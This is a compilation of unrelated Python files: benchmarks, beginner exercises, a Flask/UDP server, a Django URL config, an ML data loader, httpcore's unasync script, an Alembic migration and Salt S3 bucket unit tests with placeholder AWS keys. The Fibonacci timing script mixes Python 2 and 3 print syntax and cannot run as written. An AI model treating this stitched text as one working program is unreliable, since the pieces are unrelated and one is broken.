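# count1, count2 = counter.getSentenceCount('Clinton', 'Trump', (1, 9, 2016), (30, 9, 2016))
# Dates are (day, month, year) tuples, matching the datetime.date(...) unpacking above.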
|
class WalkNavigation:
jump_height = None
mouse_speed = None
teleport_time = None
use_gravity = None
use_mouse_reverse = None
view_height = None
walk_speed = None
walk_speed_factor = None
|
from time import time
import fibonacci as pf
import cFibonacci as cf
n = 1000000
t1 = time()
pf.ifib(n)
t2 = time()
cf.ifib(n)
t3 = time()
print("")
print("n=" + str(n))
print("Iterative fibonacci time in Python: " + str(t2-t1))
print("Iterative fibonacci time in C: " + str(t3-t2))
print("C/Python ratio: " + str((t2-t1)/(t3-t2)))
print("")
t1 = time()
pf.fdfib(n)
t2 = time()
print "Fast doubling fibonacci time in Python: " + str(t2-t1)
print
n = 40
t1 = time()
pf.rfib(n)
t2 = time()
cf.rfib(n)
t3 = time()
print "n=" + str(n)
print "Recursive fibonacci time in Python: " + str(t2-t1)
print "Recursive fibonacci time in C: " + str(t3-t2)
print "C/Python ratio: " + str((t2-t1)/(t3-t2))
|
from setuptools import setup, find_packages
setup(name="Qelos Core",
description="qelos-core",
author="Sum-Ting Wong",
author_email="sumting@wo.ng",
install_requires=[],
packages=["qelos_core"],
)
|
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 7 20:14:28 2021
@author: punti
"""
print("Hello World")
|
n = int(input())
for i in range(1, n + 1):
print(i)
|
# ex028 is v1.0 of the game: keep guessing until you hit the number the computer 'thought' of
# integer between 0 and 10
from random import randint
pc = randint(0, 10)
print('''I am your computer,...
I have just thought of a number between 0 and 10.
Can you guess it in fewer than 4 attempts?''')
acertou = False
palpite = 0
while not acertou:
jogador = int(input('Your guess: '))
palpite += 1
if jogador == pc:
acertou = True
else:
if jogador < pc:
print('Higher... Try again')
else:
print('Lower... Try again')
print(f'You got it in {palpite} attempts!', end=' ')
if palpite <= 3:
print('Congratulations!')
else:
print('Better luck next time!')
|
from flask import Flask, abort
import json
import socket, sys
app = Flask(__name__)
PORT = 7555
MAX = 65535
temp= []
@app.route('/node', methods=['GET'])
def semua():
return json.dumps(temp)
@app.route('/node/<int:node_id>', methods=['GET'])
def satu(node_id):
node = None
for n in temp :
if n["id"] == node_id :
node = n
if node :
return json.dumps(node)
else :
abort(404)
if __name__=='__main__':
app.run(debug=True, port=7555)
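# NOTE: app.run() blocks until the Flask server stops, so the UDP listener below only
# starts after the web server exits; run it in a separate thread/process to use both at once.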
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', PORT))
while True:
datax, address = s.recvfrom(MAX)
temp.append(datax)
print('The client says', datax)
|
from django.conf import settings
from django.urls import include, re_path
from django.conf.urls.static import static
from django.contrib import admin
from testproject import views
urlpatterns = [
re_path(r'^admin/', admin.site.urls),
re_path(r'^$', views.TestView.as_view(), name='home'),
re_path(r'^groups-manager/', include('groups_manager.urls', namespace='groups_manager')),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
|
#!/usr/bin/env python
"""
Neighboring WBEM agents.
"""
import sys
import logging
import lib_util
import lib_uris
import lib_wbem
import lib_common
import lib_credentials
from lib_properties import pc
from sources_types import neighborhood as survol_neighborhood
# Similar to portal_wbem.py except that:
# - This script uses SLP.
# - This script can only give top-level URLs.
def _add_from_wbem_cimom(grph, cimom_wbem):
parsed_url = lib_util.survol_urlparse(cimom_wbem)
host_wbem = parsed_url.hostname
logging.debug("host_wbem=%s", host_wbem)
if not host_wbem:
return None
# http://mymachine:8000/survol/namespaces_wbem.py?xid=http:%2F%2F192.168.0.17:5988/.
cimom_wbem_cgi = cimom_wbem.replace("//", "%2f%2f")
logging.debug("cimomWbem=%s cimom_wbem_cgi=%s", cimom_wbem, cimom_wbem_cgi)
url_wbem = lib_wbem.WbemAllNamespacesUrl(cimom_wbem_cgi)
wbem_node = lib_common.NodeUrl(url_wbem)
wbem_host_node = lib_uris.gUriGen.HostnameUri(host_wbem)
grph.add((wbem_node, pc.property_information, lib_util.NodeLiteral(cimom_wbem)))
grph.add((wbem_node, pc.property_host, wbem_host_node))
return wbem_node
def _wbem_servers_display(grph):
cred_names = lib_credentials.get_credentials_names("WBEM")
logging.debug("WbemServersDisplay")
for cimom_wbem in cred_names:
logging.debug("WbemServersDisplay cimomWbem=%s", cimom_wbem)
# The credentials are not needed until a Survol agent uses HTTPS.
wbem_node = _add_from_wbem_cimom(grph, cimom_wbem)
if not wbem_node:
continue
grph.add((wbem_node, pc.property_information, lib_util.NodeLiteral("Static definition")))
def Main():
# If this flag is set, the script uses SLP to discover WBEM Agents.
paramkey_slp = "Service Location Protocol"
cgiEnv = lib_common.ScriptEnvironment(
parameters={paramkey_slp: False}
)
flag_slp = bool(cgiEnv.get_parameters(paramkey_slp))
grph = cgiEnv.GetGraph()
_wbem_servers_display(grph)
if flag_slp:
dict_services = survol_neighborhood.GetSLPServices("survol")
for key_service in dict_services:
wbem_node = _add_from_wbem_cimom(grph, key_service)
if not wbem_node:
continue
grph.add((wbem_node, pc.property_information, lib_util.NodeLiteral("Service Location Protocol")))
attrs_service = dict_services[key_service]
for key_attr in attrs_service:
prop_attr = lib_common.MakeProp(key_attr)
val_attr = attrs_service[key_attr]
grph.add((wbem_node, prop_attr, lib_util.NodeLiteral(val_attr)))
cgiEnv.OutCgiRdf()
if __name__ == '__main__':
Main()
|
import os
import shutil
import tensorflow as tf
from tensorflow import keras
from logs import logDecorator as lD
import jsonref
import numpy as np
import pickle
from tqdm import tqdm
import PIL
import matplotlib.pyplot as plt
config = jsonref.load(open('../config/config.json'))
logBase = config['logging']['logBase'] + '.modules.data.getData'
dataFolder = '../data/raw_data/'
@lD.log(logBase + '.getInputDataDict')
def getInputDataDict(logger, resize_shape=(56, 56, 3)):
try:
shape2D = resize_shape[:2]
channelSize = resize_shape[-1]
dataDict = mnistFashion()
inputDataDict = {}
for dataName in ['train_images', 'test_images']:
tmpArr = []
imageStack = dataDict[ dataName ]
for img in tqdm(imageStack):
img = img / 255.0
img_resized = PIL.Image.fromarray(img).resize(size=shape2D)
img_resized = np.array(img_resized)
tmpArr.append( img_resized )
tmpArr = np.stack( tmpArr )
tmpArr = np.stack([ tmpArr ] * channelSize, axis=-1)
inputDataDict[dataName] = tmpArr
return inputDataDict
except Exception as e:
logger.error('Unable to generate train data \n{}'.format(str(e)))
@lD.log(logBase + '.mnistFashion')
def mnistFashion(logger):
try:
cacheFilePath = os.path.join(dataFolder, 'mnist_fashion.pkl')
if not os.path.exists( cacheFilePath ):
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
shutil.rmtree('/Users/lingyit/.keras/datasets/fashion-mnist/')
dataDict = {
'train_images' : train_images,
'train_labels' : train_labels,
'test_images' : test_images,
'test_labels' : test_labels
}
pickle.dump(dataDict, open(cacheFilePath, 'wb'))
else:
dataDict = pickle.load(open(cacheFilePath, 'rb'))
return dataDict
except Exception as e:
logger.error('Unable to get mnist Fashion data \n{}'.format(str(e)))
@lD.log(logBase + '.showOneImg')
def showOneImg(logger, imageIndex):
try:
dataDict = mnistFashion()
train_images = dataDict['train_images']
train_labels = dataDict['train_labels']
test_images = dataDict['test_images']
test_labels = dataDict['test_labels']
visualiseArray( train_images[imageIndex] )
except Exception as e:
logger.error('Unable to show one image \n{}'.format(str(e)))
@lD.log(logBase + '.visualiseArray')
def visualiseArray(logger, img):
try:
plt.figure()
plt.imshow( img )
plt.colorbar()
plt.grid(False)
plt.show()
except Exception as e:
logger.error('Unable to visualise image array \n{}'.format(str(e)))
@lD.log(logBase + '.showMultipleImgs')
def showMultipleImgs(logger, N):
try:
dataDict = mnistFashion()
train_images = dataDict['train_images']
train_labels = dataDict['train_labels']
test_images = dataDict['test_images']
test_labels = dataDict['test_labels']
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
stackedImg = np.stack([ train_images[i] for i in range(N) ], axis=-1)
labels = [ class_names[train_labels[i]] for i in range(N) ]
visualiseStackedArray( stackedImg, labels )
except Exception as e:
logger.error('Unable to show one image \n{}'.format(str(e)))
@lD.log(logBase + '.visualiseStackedArray')
def visualiseStackedArray(logger, stackedImg, xlabels=None, cmap=plt.cm.binary):
try:
N = stackedImg.shape[-1]
# subplot grid dimensions must be integers
sqrtN = int(np.ceil(np.sqrt(N)))
if sqrtN > 10:
rowN, colN = int(np.ceil(N / 10)), 10
else:
rowN, colN = sqrtN, sqrtN
plt.figure(figsize=(10, rowN))
for i in range(N):
plt.subplot(rowN, colN, i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow( stackedImg[:, :, i], cmap=cmap )
if xlabels is not None:
plt.xlabel( xlabels[i] )
plt.tight_layout()
plt.show()
except Exception as e:
logger.error('Unable to visualise stacked array \n{}'.format(str(e)))
@lD.log(logBase + '.main')
def main(logger, resultsDict):
try:
print('getting numpy MNIST data dictionary')
dataDict = mnistFashion()
print('keys', dataDict.keys())
print('getting stacked & resized MNIST data array with channels')
inputDataDict = getInputDataDict( resize_shape=(56, 56, 3) )
print( inputDataDict['train_images'].shape, inputDataDict['train_images'].max(), inputDataDict['train_images'].min() )
print( inputDataDict['test_images'].shape, inputDataDict['test_images'].max(), inputDataDict['test_images'].min() )
except Exception as e:
logger.error('Unable to run main \n{}'.format(str(e)))
if __name__ == '__main__':
print('tf.__version__ :', tf.__version__)
### -------------------------------------------------
### Give it a try run on getting mnist fashion data
### -------------------------------------------------
print('try fetching data..')
dataDict = mnistFashion()
for dataName in dataDict:
data = dataDict[dataName]
print(dataName, type(data), data.shape)
|
#!venv/bin/python
import re
import os
import sys
SUBS = [
('AsyncIteratorByteStream', 'IteratorByteStream'),
('AsyncIterator', 'Iterator'),
('AutoBackend', 'SyncBackend'),
('Async([A-Z][A-Za-z0-9_]*)', r'Sync\2'),
('async def', 'def'),
('async with', 'with'),
('async for', 'for'),
('await ', ''),
('arequest', 'request'),
('aclose', 'close'),
('aclose_func', 'close_func'),
('aiterator', 'iterator'),
('__aenter__', '__enter__'),
('__aexit__', '__exit__'),
('__aiter__', '__iter__'),
('@pytest.mark.anyio', ''),
('@pytest.mark.trio', ''),
(r'@pytest.fixture\(params=\["auto", "anyio"\]\)',
'@pytest.fixture(params=["sync"])'),
('lookup_async_backend', "lookup_sync_backend"),
('auto', 'sync'),
]
COMPILED_SUBS = [
(re.compile(r'(^|\b)' + regex + r'($|\b)'), repl)
for regex, repl in SUBS
]
def unasync_line(line):
for regex, repl in COMPILED_SUBS:
line = re.sub(regex, repl, line)
return line
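# Example (illustrative) of the line-by-line rewriting performed by the table above:
# unasync_line("async def arequest(self):")   -> "def request(self):"
# unasync_line("async with AsyncLock():")     -> "with SyncLock():"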
def unasync_file(in_path, out_path):
with open(in_path, "r") as in_file:
with open(out_path, "w", newline="") as out_file:
for line in in_file.readlines():
line = unasync_line(line)
out_file.write(line)
def unasync_file_check(in_path, out_path):
with open(in_path, "r") as in_file:
with open(out_path, "r") as out_file:
for in_line, out_line in zip(in_file.readlines(), out_file.readlines()):
expected = unasync_line(in_line)
if out_line != expected:
print(f'unasync mismatch between {in_path!r} and {out_path!r}')
print(f'Async code: {in_line!r}')
print(f'Expected sync code: {expected!r}')
print(f'Actual sync code: {out_line!r}')
sys.exit(1)
def unasync_dir(in_dir, out_dir, check_only=False):
for dirpath, dirnames, filenames in os.walk(in_dir):
for filename in filenames:
if not filename.endswith('.py'):
continue
rel_dir = os.path.relpath(dirpath, in_dir)
in_path = os.path.normpath(os.path.join(in_dir, rel_dir, filename))
out_path = os.path.normpath(os.path.join(out_dir, rel_dir, filename))
print(in_path, '->', out_path)
if check_only:
unasync_file_check(in_path, out_path)
else:
unasync_file(in_path, out_path)
def main():
check_only = '--check' in sys.argv
unasync_dir("httpcore/_async", "httpcore/_sync", check_only=check_only)
unasync_dir("tests/async_tests", "tests/sync_tests", check_only=check_only)
if __name__ == '__main__':
main()
|
# Copyright (C) 2020 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""
Add 2 new roles for scoping objects
Create Date: 2018-10-23 11:02:28.166523
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import datetime
from alembic import op
from ggrc.migrations.utils import migrator
from ggrc.migrations.utils import (
acr_propagation_constants_scoping_objects_new_roles as acr_constants
)
from ggrc.migrations.utils import acr_propagation
# revision identifiers, used by Alembic.
revision = '348465c9e5ed'
down_revision = 'cb58d1d52368'
SCOPING_OBJECTS = [
"AccessGroup",
"DataAsset",
"Facility",
"Market",
"Metric",
"OrgGroup",
"Process",
"Product",
"ProductGroup",
"Project",
"System",
"TechnologyEnvironment",
"Vendor",
]
NEW_ROLES = [
"Line of Defense One Contacts",
"Vice Presidents",
]
def _add_roles_for_objects(objects, new_roles):
""" Creates new roles in acr for a given list of objects.
Args:
objects: object names for which new roles should be added
new_roles: list of roles to add into the acr
"""
connection = op.get_bind()
user_id = migrator.get_migration_user_id(connection)
update_entries = []
for object_name in objects:
for role_name in new_roles:
update_entries.append({
'name': role_name,
'object_type': object_name,
'mandatory': False,
'non_editable': True,
'created_at': datetime.datetime.now(),
'updated_at': datetime.datetime.now(),
'default_to_current_user': False,
'modified_by_id': user_id,
})
op.bulk_insert(
acr_propagation.ACR_TABLE,
update_entries
)
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
_add_roles_for_objects(SCOPING_OBJECTS, NEW_ROLES)
acr_propagation.propagate_roles(
acr_constants.GGRC_NEW_ROLES_PROPAGATION,
with_update=True
)
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
raise Exception("Downgrade is not supported.")
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import random
import string
import logging
from copy import deepcopy
# Import Salt Testing libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
MagicMock,
NO_MOCK,
NO_MOCK_REASON,
patch
)
# Import Salt libs
import salt.config
import salt.loader
import salt.modules.boto_s3_bucket as boto_s3_bucket
from salt.utils.versions import LooseVersion
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=import-error,redefined-builtin
# pylint: disable=import-error,no-name-in-module,unused-import
try:
import boto
import boto3
from botocore.exceptions import ClientError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
# pylint: enable=import-error,no-name-in-module,unused-import
# the boto_s3_bucket module relies on the connect_to_region() method
# which was added in boto 2.8.0
# https://github.com/boto/boto/commit/33ac26b416fbb48a60602542b4ce15dcc7029f12
required_boto3_version = '1.2.1'
log = logging.getLogger(__name__)
def _has_required_boto():
'''
Returns True/False boolean depending on if Boto is installed and correct
version.
'''
if not HAS_BOTO:
return False
elif LooseVersion(boto3.__version__) < LooseVersion(required_boto3_version):
return False
else:
return True
if _has_required_boto():
region = 'us-east-1'
access_key = 'GKTADJGHEIQSXMKKRBJ08H'
secret_key = 'askdjghsdfjkghWupUjasdflkdfklgjsdfjajkghs'
conn_parameters = {'region': region, 'key': access_key, 'keyid': secret_key, 'profile': {}}
error_message = 'An error occurred (101) when calling the {0} operation: Test-defined error'
e404_error = ClientError({
'Error': {
'Code': '404',
'Message': "Test-defined error"
}
}, 'msg')
not_found_error = ClientError({
'Error': {
'Code': 'NoSuchBucket',
'Message': "Test-defined error"
}
}, 'msg')
error_content = {
'Error': {
'Code': 101,
'Message': "Test-defined error"
}
}
create_ret = {
'Location': 'nowhere',
}
list_ret = {
'Buckets': [{
'Name': 'mybucket',
'CreationDate': None
}],
'Owner': {
'DisplayName': 'testuser',
'ID': '12341234123'
},
'ResponseMetadata': {'Key': 'Value'}
}
config_ret = {
'get_bucket_acl': {
'Grants': [{
'Grantee': {
'DisplayName': 'testowner',
'ID': 'sdfghjklqwertyuiopzxcvbnm'
},
'Permission': 'FULL_CONTROL'
}, {
'Grantee': {
'URI': 'http://acs.amazonaws.com/groups/global/AllUsers'
},
'Permission': 'READ'
}],
'Owner': {
'DisplayName': 'testowner',
'ID': 'sdfghjklqwertyuiopzxcvbnm'
}
},
'get_bucket_cors': {
'CORSRules': [{
'AllowedMethods': ["GET"],
'AllowedOrigins': ["*"],
}]
},
'get_bucket_lifecycle_configuration': {
'Rules': [{
'Expiration': {
'Days': 1
},
'Prefix': 'prefix',
'Status': 'Enabled',
'ID': 'asdfghjklpoiuytrewq'
}]
},
'get_bucket_location': {
'LocationConstraint': 'EU'
},
'get_bucket_logging': {
'LoggingEnabled': {
'TargetBucket': 'my-bucket',
'TargetPrefix': 'prefix'
}
},
'get_bucket_notification_configuration': {
'LambdaFunctionConfigurations': [{
'LambdaFunctionArn': 'arn:aws:lambda:us-east-1:111111222222:function:my-function',
'Id': 'zxcvbnmlkjhgfdsa',
'Events': ["s3:ObjectCreated:*"],
'Filter': {
'Key': {
'FilterRules': [{
'Name': 'prefix',
'Value': 'string'
}]
}
}
}]
},
'get_bucket_policy': {
'Policy':
'{"Version":"2012-10-17","Statement":[{"Sid":"","Effect":"Allow","Principal":{"AWS":"arn:aws:iam::111111222222:root"},"Action":"s3:PutObject","Resource":"arn:aws:s3:::my-bucket/*"}]}'
},
'get_bucket_replication': {
'ReplicationConfiguration': {
'Role': 'arn:aws:iam::11111222222:my-role',
'Rules': [{
'ID': "r1",
'Prefix': "prefix",
'Status': "Enabled",
'Destination': {
'Bucket': "arn:aws:s3:::my-bucket"
}
}]
}
},
'get_bucket_request_payment': {'Payer': 'Requester'},
'get_bucket_tagging': {
'TagSet': [{
'Key': 'c',
'Value': 'd'
}, {
'Key': 'a',
'Value': 'b',
}]
},
'get_bucket_versioning': {
'Status': 'Enabled'
},
'get_bucket_website': {
'ErrorDocument': {
'Key': 'error.html'
},
'IndexDocument': {
'Suffix': 'index.html'
}
}
}
@skipIf(HAS_BOTO is False, 'The boto module must be installed.')
@skipIf(_has_required_boto() is False, 'The boto3 module must be greater than'
' or equal to version {0}'
.format(required_boto3_version))
@skipIf(NO_MOCK, NO_MOCK_REASON)
class BotoS3BucketTestCaseBase(TestCase, LoaderModuleMockMixin):
conn = None
def setup_loader_modules(self):
self.opts = opts = salt.config.DEFAULT_MINION_OPTS
utils = salt.loader.utils(
opts,
whitelist=['boto3', 'args', 'systemd', 'path', 'platform'],
context={})
return {boto_s3_bucket: {'__utils__': utils}}
def setUp(self):
super(BotoS3BucketTestCaseBase, self).setUp()
boto_s3_bucket.__init__(self.opts)
del self.opts
# Set up MagicMock to replace the boto3 session
# connections keep getting cached from prior tests, can't find the
# correct context object to clear it. So randomize the cache key, to prevent any
# cache hits
conn_parameters['key'] = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
self.patcher = patch('boto3.session.Session')
self.addCleanup(self.patcher.stop)
self.addCleanup(delattr, self, 'patcher')
mock_session = self.patcher.start()
session_instance = mock_session.return_value
self.conn = MagicMock()
self.addCleanup(delattr, self, 'conn')
session_instance.client.return_value = self.conn
class BotoS3BucketTestCaseMixin(object):
pass
class BotoS3BucketTestCase(BotoS3BucketTestCaseBase, BotoS3BucketTestCaseMixin):
'''
TestCase for salt.modules.boto_s3_bucket module
'''
def test_that_when_checking_if_a_bucket_exists_and_a_bucket_exists_the_bucket_exists_method_returns_true(self):
'''
Tests checking s3 bucket existence when the s3 bucket already exists
'''
self.conn.head_bucket.return_value = None
result = boto_s3_bucket.exists(Bucket='mybucket', **conn_parameters)
self.assertTrue(result['exists'])
def test_that_when_checking_if_a_bucket_exists_and_a_bucket_does_not_exist_the_bucket_exists_method_returns_false(self):
'''
Tests checking s3 bucket existence when the s3 bucket does not exist
'''
self.conn.head_bucket.side_effect = e404_error
result = boto_s3_bucket.exists(Bucket='mybucket', **conn_parameters)
self.assertFalse(result['exists'])
def test_that_when_checking_if_a_bucket_exists_and_boto3_returns_an_error_the_bucket_exists_method_returns_error(self):
'''
Tests checking s3 bucket existence when boto returns an error
'''
self.conn.head_bucket.side_effect = ClientError(error_content, 'head_bucket')
result = boto_s3_bucket.exists(Bucket='mybucket', **conn_parameters)
self.assertEqual(result.get('error', {}).get('message'), error_message.format('head_bucket'))
def test_that_when_creating_a_bucket_succeeds_the_create_bucket_method_returns_true(self):
'''
tests True bucket created.
'''
self.conn.create_bucket.return_value = create_ret
result = boto_s3_bucket.create(Bucket='mybucket',
LocationConstraint='nowhere',
**conn_parameters)
self.assertTrue(result['created'])
def test_that_when_creating_a_bucket_fails_the_create_bucket_method_returns_error(self):
'''
tests False bucket not created.
'''
self.conn.create_bucket.side_effect = ClientError(error_content, 'create_bucket')
result = boto_s3_bucket.create(Bucket='mybucket',
LocationConstraint='nowhere',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'), error_message.format('create_bucket'))
def test_that_when_deleting_a_bucket_succeeds_the_delete_bucket_method_returns_true(self):
'''
tests True bucket deleted.
'''
result = boto_s3_bucket.delete(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['deleted'])
def test_that_when_deleting_a_bucket_fails_the_delete_bucket_method_returns_false(self):
'''
tests False bucket not deleted.
'''
self.conn.delete_bucket.side_effect = ClientError(error_content, 'delete_bucket')
result = boto_s3_bucket.delete(Bucket='mybucket',
**conn_parameters)
self.assertFalse(result['deleted'])
def test_that_when_describing_bucket_it_returns_the_dict_of_properties_returns_true(self):
'''
Tests describing parameters if bucket exists
'''
for key, value in six.iteritems(config_ret):
getattr(self.conn, key).return_value = deepcopy(value)
result = boto_s3_bucket.describe(Bucket='mybucket', **conn_parameters)
self.assertTrue(result['bucket'])
def test_that_when_describing_bucket_it_returns_the_dict_of_properties_returns_false(self):
'''
Tests describing parameters if bucket does not exist
'''
self.conn.get_bucket_acl.side_effect = not_found_error
result = boto_s3_bucket.describe(Bucket='mybucket', **conn_parameters)
self.assertFalse(result['bucket'])
def test_that_when_describing_bucket_on_client_error_it_returns_error(self):
'''
Tests describing parameters failure
'''
self.conn.get_bucket_acl.side_effect = ClientError(error_content, 'get_bucket_acl')
result = boto_s3_bucket.describe(Bucket='mybucket', **conn_parameters)
self.assertTrue('error' in result)
def test_that_when_listing_buckets_succeeds_the_list_buckets_method_returns_true(self):
'''
tests True buckets listed.
'''
self.conn.list_buckets.return_value = deepcopy(list_ret)
result = boto_s3_bucket.list(**conn_parameters)
self.assertTrue(result['Buckets'])
def test_that_when_listing_bucket_fails_the_list_bucket_method_returns_false(self):
'''
tests False no bucket listed.
'''
ret = deepcopy(list_ret)
log.info(ret)
ret['Buckets'] = list()
self.conn.list_buckets.return_value = ret
result = boto_s3_bucket.list(**conn_parameters)
self.assertFalse(result['Buckets'])
def test_that_when_listing_bucket_fails_the_list_bucket_method_returns_error(self):
'''
tests False bucket error.
'''
self.conn.list_buckets.side_effect = ClientError(error_content, 'list_buckets')
result = boto_s3_bucket.list(**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'), error_message.format('list_buckets'))
def test_that_when_putting_acl_succeeds_the_put_acl_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_acl(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_acl_fails_the_put_acl_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_acl.side_effect = ClientError(error_content,
'put_bucket_acl')
result = boto_s3_bucket.put_acl(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_acl'))
def test_that_when_putting_cors_succeeds_the_put_cors_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_cors(Bucket='mybucket', CORSRules='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_cors_fails_the_put_cors_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_cors.side_effect = ClientError(error_content,
'put_bucket_cors')
result = boto_s3_bucket.put_cors(Bucket='mybucket', CORSRules='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_cors'))
def test_that_when_putting_lifecycle_configuration_succeeds_the_put_lifecycle_configuration_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_lifecycle_configuration(Bucket='mybucket',
Rules='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_lifecycle_configuration_fails_the_put_lifecycle_configuration_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_lifecycle_configuration.side_effect = ClientError(error_content,
'put_bucket_lifecycle_configuration')
result = boto_s3_bucket.put_lifecycle_configuration(Bucket='mybucket',
Rules='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_lifecycle_configuration'))
def test_that_when_putting_logging_succeeds_the_put_logging_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_logging(Bucket='mybucket',
TargetBucket='arn:::::',
TargetPrefix='asdf',
TargetGrants='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_logging_fails_the_put_logging_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_logging.side_effect = ClientError(error_content,
'put_bucket_logging')
result = boto_s3_bucket.put_logging(Bucket='mybucket',
TargetBucket='arn:::::',
TargetPrefix='asdf',
TargetGrants='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_logging'))
def test_that_when_putting_notification_configuration_succeeds_the_put_notification_configuration_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_notification_configuration(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_notification_configuration_fails_the_put_notification_configuration_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_notification_configuration.side_effect = ClientError(error_content,
'put_bucket_notification_configuration')
result = boto_s3_bucket.put_notification_configuration(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_notification_configuration'))
def test_that_when_putting_policy_succeeds_the_put_policy_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_policy(Bucket='mybucket',
Policy='{}',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_policy_fails_the_put_policy_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_policy.side_effect = ClientError(error_content,
'put_bucket_policy')
result = boto_s3_bucket.put_policy(Bucket='mybucket',
Policy='{}',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_policy'))
def test_that_when_putting_replication_succeeds_the_put_replication_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_replication(Bucket='mybucket',
Role='arn:aws:iam:::',
Rules='[]',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_replication_fails_the_put_replication_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_replication.side_effect = ClientError(error_content,
'put_bucket_replication')
result = boto_s3_bucket.put_replication(Bucket='mybucket',
Role='arn:aws:iam:::',
Rules='[]',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_replication'))
def test_that_when_putting_request_payment_succeeds_the_put_request_payment_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_request_payment(Bucket='mybucket',
Payer='Requester',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_request_payment_fails_the_put_request_payment_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_request_payment.side_effect = ClientError(error_content,
'put_bucket_request_payment')
result = boto_s3_bucket.put_request_payment(Bucket='mybucket',
Payer='Requester',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_request_payment'))
def test_that_when_putting_tagging_succeeds_the_put_tagging_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_tagging(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_tagging_fails_the_put_tagging_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_tagging.side_effect = ClientError(error_content,
'put_bucket_tagging')
result = boto_s3_bucket.put_tagging(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_tagging'))
def test_that_when_putting_versioning_succeeds_the_put_versioning_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_versioning(Bucket='mybucket',
Status='Enabled',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_versioning_fails_the_put_versioning_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_versioning.side_effect = ClientError(error_content,
'put_bucket_versioning')
result = boto_s3_bucket.put_versioning(Bucket='mybucket',
Status='Enabled',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_versioning'))
def test_that_when_putting_website_succeeds_the_put_website_method_returns_true(self):
'''
tests True bucket updated.
'''
result = boto_s3_bucket.put_website(Bucket='mybucket',
**conn_parameters)
self.assertTrue(result['updated'])
def test_that_when_putting_website_fails_the_put_website_method_returns_error(self):
'''
tests False bucket not updated.
'''
self.conn.put_bucket_website.side_effect = ClientError(error_content,
'put_bucket_website')
result = boto_s3_bucket.put_website(Bucket='mybucket',
**conn_parameters)
self.assertEqual(result.get('error', {}).get('message'),
error_message.format('put_bucket_website'))
def test_that_when_deleting_cors_succeeds_the_delete_cors_method_returns_true(self):
'''
tests True bucket attribute deleted.
'''
result = boto_s3_bucket.delete_cors(Bucket='mybucket',
**conn_parameters)
